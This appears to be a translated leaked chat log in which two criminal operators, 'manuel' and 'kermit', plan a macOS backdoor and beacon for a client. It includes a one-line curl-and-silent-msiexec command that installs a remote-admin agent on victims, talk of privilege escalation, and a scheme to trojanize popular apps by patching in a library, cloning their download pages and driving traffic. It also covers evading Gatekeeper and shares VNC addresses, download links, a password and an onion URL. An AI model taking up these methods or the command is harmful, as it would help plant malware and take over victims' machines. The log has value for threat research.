[22.09.21 12:53:13] manuel: Hello. I have a client on mac os . He's asking for a build.
[22.09.21 12:53:18] manuel: Can we give it away?
[22.09.21 12:57:08] kermit: I can.
[22.09.21 12:57:11] kermit: hey.
[22.09.21 12:57:14] kermit: and the bands are ready
[22.09.21 12:57:21] kermit: collin knows
[22.09.21 12:57:31] kermit: text the chat room
[22.09.21 12:57:39] manuel: Okay. Through colin to order:
[22.09.21 12:57:40] kermit: to keep people informed
[22.09.21 12:57:42] manuel: ?
[22.09.21 12:58:13] kermit: yeah. he should probably create a separate group in the admin area
[22.09.21 12:58:24] manuel: Yeah, I'll give it to him.
[25.10.21 10:22:45] manuel: Hi.
[25.10.21 10:28:28] manuel: Silver said you can write about LPE
[25.10.21 10:43:10] kermit: koo
[25.10.21 10:43:10] kermit: yes
[25.10.21 10:44:45] manuel: How do I do that? Client wants to run it through BC It needs to run it through cmd as administrator
[25.10.21 10:45:03] kermit: athera?
[25.10.21 10:45:09] manuel: Yes
[25.10.21 10:45:23] kermit: what is it?
[25.10.21 10:45:34] kermit: and with what rights does his uk start?
[25.10.21 10:45:43] manuel: white tool for remote admin
[25.10.21 10:46:17] manuel: normal
[25.10.21 10:47:44] manuel: that's the line:
[25.10.21 10:47:47] kermit: for lpe you have to know the system patches
[25.10.21 10:47:47] manuel: ``
commands this
" [03:05:59] <tenet> curl -o setup.msi "https://HelpdeskSupport815372789.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=kered.falmen2342%40gmail.com" && msiexec /i setup.msi /qn IntegratorLogin=kered.falmen2342@gmail.com CompanyId=1
```
[25.10.21 10:47:52] kermit: 0doesn't exist yet
[25.10.21 10:48:14] manuel: You can check it via BC, right?
[25.10.21 10:49:09] kermit: I don't know.
[25.10.21 10:49:14] manuel: What kind of queries works?
[25.10.21 10:49:19] kermit: I don't know actual uk commands
[25.10.21 10:49:45] kermit: no lpe now. you can look at old ones, if you have info about system
[25.10.21 10:51:51] manuel: ``
: W100
2: 19043
3: 30
```
[25.10.21 10:51:58] manuel: like this?
[25.10.21 10:52:11] kermit: no. this is the version of the OS
[25.10.21 10:52:24] kermit: run command on your bakery systeminfo there will be info about patches
[28.10.21 13:36:00] kermit: ping
[28.10.21 13:36:01] kermit: off
[28.10.21 13:36:20] manuel: Ghbdtn
[28.10.21 13:36:21] manuel: Hi.
[28.10.21 13:36:52] manuel: okay.
[28.10.21 13:37:07] manuel: they were on the wn, right?
[28.10.21 13:37:13] manuel: vnc
[28.10.21 13:37:39] manuel: Yeah.
[28.10.21 13:41:20] manuel: no connection
[28.10.21 13:48:14] manuel: Write to admin
[28.10.21 14:09:41] manuel: I already wrote
[28.10.21 14:09:44] manuel: does gator
[28.10.21 14:09:56] manuel: There's no connection with them
[28.10.21 14:12:20] manuel: 185.25.48.83:5904 - version 11.
[28.10.21 14:12:28] manuel: it works
[28.10.21 14:13:35] manuel: You can work
[28.10.21 14:17:56] manuel: Bro, if we can all go live this week, the customer will write a good bonus.
[28.10.21 14:18:49] manuel: Yeah.
[28.10.21 14:18:55] manuel: Yeah.
[28.10.21 14:19:10] manuel: He says five or six poppies go past the gate every day.
[28.10.21 14:19:32] manuel: Corps is worth 30 bucks
[28.10.21 14:19:53] manuel: I agree.
[28.10.21 14:20:03] manuel: He's been sick for two weeks with the crown
[28.10.21 14:21:25] manuel: Yeah I remember, but for some reason we didn't let him in the fight...
[28.10.21 14:52:29] manuel: 185.25.48.83:5901 - version 10 ready for battle
[28.10.21 15:10:17] kermit: thanks.
[29.10.21 09:49:09] manuel: hi.
[29.10.21 09:49:14] manuel: Any news?
[29.10.21 09:49:18] manuel: on the cd
[29.10.21 09:49:32] kermit: ku. what do you mean? so i can't test without switching to a new admin
[29.10.21 09:49:36] kermit: they didn't give me addresses
[29.10.21 09:49:44] kermit: all info in the chat room
[29.10.21 09:49:49] kermit: Collin wrote yesterday
[29.10.21 09:49:52] manuel: all transferred to Monday?
[29.10.21 09:50:30] kermit: yeah
[10/29/221 09:51:20] manuel: Got it. VMs with mac axis are being taken away for maintenance. Will be available later.
[29.10.21 09:51:31] kermit: ok
[29.10.21 09:52:01] kermit: sorry for the delay. tell the customer to be more active
[29.10.21 09:52:33] manuel: Yeah, okay.
[29.10.21 09:52:51] manuel: we'll never get the prize...)) but otherwise everything is okay.
[29.10.21 09:53:04] kermit: how much was the bonus?
[29.10.21 09:53:35] manuel: several thousand bucks
[29.10.21 09:54:01] kermit: a few tens of bucks
[29.10.21 09:54:09] manuel: yeah
[29.10.21 09:54:18] kermit: greedy
[29.10.21 09:54:22] manuel: )))
[17.11.21 18:21:49] manuel: good evening.
[17.11.21 18:21:53] manuel: I have a question:
[17.11.21 18:23:30] manuel: ``
 tell me please what are the options for starting a file ?
[21:21:05] <cheese> which ones are less dirty
[21:21:07] <cheese talk about mac os
[21:21:29] <cheese> in theory what formats are possible ?
[21:21:42] <cheese> maybe there is a variant of js to make some kind of lowader ?
```
[17.11.21 22:34:00] kermit: yeah, there's tons of them
[17.11.21 22:34:08] kermit: from apple script to python and stuff
[11/18/21 21 07:32:53] manuel: What's the most acceptable?
[18.11.21 07:33:01] manuel: They just don't know what they want.)
[18.11.21 09:40:50] kermit: how are they going to get the cars?
[19.11.21 10:47:52] kermit: ku
[19.11.21 10:47:58] kermit: kick some go specialists
[19.11.21 10:48:08] kermit: try to build a timeserver on linux
[19.11.21 10:49:50] manuel: Hi.
[19.11.21 10:50:01] manuel: I'll talk to sylvester who I can kick
[19.11.21 10:51:58] manuel: blake alhponse says silver
[19.11.21 10:54:02] manuel: Have you written to any of them?
[19.11.21 10:55:59] kermit: no. i asked for a private message in general chat
[19.11.21 10:56:12] kermit: but it's better to build on linux
[19.11.21 10:57:27] manuel: okay, I'll write them
[19.11.21 10:57:27] manuel: where can I get the source code?
[19.11.21 11:01:58] manuel: That's how blake answered
[19.11.21 11:02:08] manuel: What should I tell him?
[19.11.21 11:02:17] manuel: Tell him to knock you
[19.11.21 11:02:27] manuel: Yeah?
[19.11.21 11:05:29] kermit: build a timeserver on linux
[19.11.21 11:05:41] kermit: you gave me the source code yourself
[19.11.21 11:05:51] manuel: Ahh... I'll look for it.
[19.11.21 11:06:09] kermit: https://github.com/geemion/Khepri/
[19.11.21 11:06:26] manuel: And why on linux and not on mac?
[19.11.21 11:07:04] kermit: do they have macOS?
[19.11.21 11:07:21] kermit: and the server will be put on linux
[22.11.21 08:17:51] manuel: Hi.
[22.11.21 08:18:07] manuel: blake built a timeserver
[22.11.21 10:01:38] kermit: Tell him to text me
[22.11.21 10:02:07] kermit: koo
[22.11.21 10:29:14] manuel: Ctqxfc gjghjie
[22.11.21 10:29:14] manuel: I'm gonna ask
[26.11.21 09:25:45] kermit: collected capri
[26.11.21 09:26:33] manuel: great!
[26.11.21 09:38:42] kermit: what to do with this shit?
[26.11.21 09:40:02] manuel: So this is the server which is like a coba yes ?
[26.11.21 09:42:04] kermit: i don't know
[26.11.21 09:44:38] manuel: the timeserver that is ?
[26.11.21 09:46:07] kermit: and beacon
[26.11.21 09:46:14] manuel: Got it.
[26.11.21 09:46:21] manuel: what about bk for mac os?
[26.11.21 09:46:36] manuel: I think kepri can be tested
[26.11.21 09:47:01] kermit: what about the backend? you still haven't answered how you load the cars
[26.11.21 09:47:14] manuel: sh was it?
[26.11.21 09:49:29] manuel: Tell me, what options are there for starting?
[26.11.21 09:49:54] kermit: via docks
[26.11.21 09:50:02] kermit: forging a legitimate application
[26.11.21 09:53:30] manuel: Okay. How do we do that?
[26.11.21 09:54:23] kermit: find a popular app
[26.11.21 09:54:26] kermit: patch
[26.11.21 09:54:41] kermit: copy application page
[26.11.21 09:54:47] kermit: and drive traffic
[26.11.21 09:56:04] manuel: How do we put a Bk into it?
[26.11.21 10:34:45] kermit: we'll add library by patching the binary
[26.11.21 10:37:24] manuel: got it, then I'll ask the customer
[26.11.21 10:37:27] manuel: when it appears
[26.11.21 14:07:36] kermit: even beacon taps in capri
[26.11.21 14:09:55] manuel: great
[26.11.21 14:10:01] kermit: just no fucking teams
[27.12.21 11:08:14] manuel: hi.
[27.12.21 11:08:22] manuel: Can we do a mac OS bk?
[27.12.21 11:14:59] kermit: hi. yes. now i'll check with the new addresses
[27.12.21 11:16:01] manuel: Okay.
[27.12.21 14:15:20] kermit: can't assemble arm 64 separately
[27.12.21 14:15:23] kermit: I have mac on intel
[27.12.21 14:15:44] manuel: let's go with Intel
[27.12.21 14:21:51] kermit: not
[12/27/221 14:21:53] kermit: got it
[27.12.21 14:21:57] kermit: what a piece of shit!
[27.12.21 14:22:34] manuel: why?
[27.12.21 14:26:43] kermit: you're so full of shit
[27.12.21 14:26:52] kermit: and my xcod crashes intermittently after refresh
[27.12.21 15:59:17] kermit: ping
[27.12.21 15:59:55] manuel: Here
[27.12.21 16:00:13] kermit: otr
[27.12.21 16:00:34] kermit: test
[27.12.21 16:00:38] manuel: Got it?
[27.12.21 16:00:42] manuel: I think so.
[27.12.21 16:00:44] kermit: da.
[27.12.21 16:01:32] manuel: You say it crashes?
[27.12.21 16:01:41] manuel: Is it safe to use in battle or you need to modify it?
[27.12.21 16:02:28] kermit: development environment crashes
[12/27/221 16:02:31] kermit: ``
9f*YmNH)EA7284W<9ejv>FIqkS
```
[12/27/221 16:04:33] kermit: ``
Download: https://qaz.im/load/6rS5H6/SQ9fze
Delete: https://qaz.im/index.php?a=delete&q=1939552313
```
[27.12.21 16:09:23] manuel: Got it. Got it. Thank you!
[27.12.21 16:09:37] manuel: What group is he knocking in admin?
[27.12.21 16:10:06] kermit: i can't test it. so i'll do it at my own risk.
[27.12.21 16:10:09] kermit: 64
	tst7
[27.12.21 16:10:12] kermit: tst7
[27.12.21 16:10:33] kermit: I'm gonna get something to eat.
[12/27/221 16:10:39] manuel: Okay. Does it need to be crypted? How does crypto work in mac os?
[12/27/221 16:10:43] manuel: Enjoy.
[12/27/221 16:10:50] kermit: ``
https://x6rciduomtjt25xigz7onkgxmusuwwuxqvidjkcramwg3lb5vvpsm7ad.onion/
```
[27.12.21 16:10:56] kermit: like any axis
[27.12.21 16:11:03] kermit: look at the dinghy
[27.12.21 16:11:13] manuel: okay.
[27.12.21 16:11:22] kermit: at first it shouldn't show up
[27.12.21 16:11:31] kermit: there's a custom av for mac
[27.12.21 16:11:40] kermit: I saw someone's blog
[27.12.21 16:11:48] kermit: but I don't think everyone uses it
[27.12.21 16:12:01] manuel: Yeah, geitkeeper is something like that, I think
[27.12.21 16:12:23] kermit: You also need to reset a bit if a file is downloaded from network
[27.12.21 16:12:34] manuel: Yes, I wrote about it
[27.12.21 16:12:59] kermit: bat script in admin is bash
[27.12.21 16:13:07] kermit: parshell is python
[27.12.21 16:13:44] kermit: it doesn't pull files
[27.12.21 16:13:53] kermit: only runs binary
[27.12.21 16:13:57] kermit: directly
[27.12.21 16:26:05] manuel: Got it.
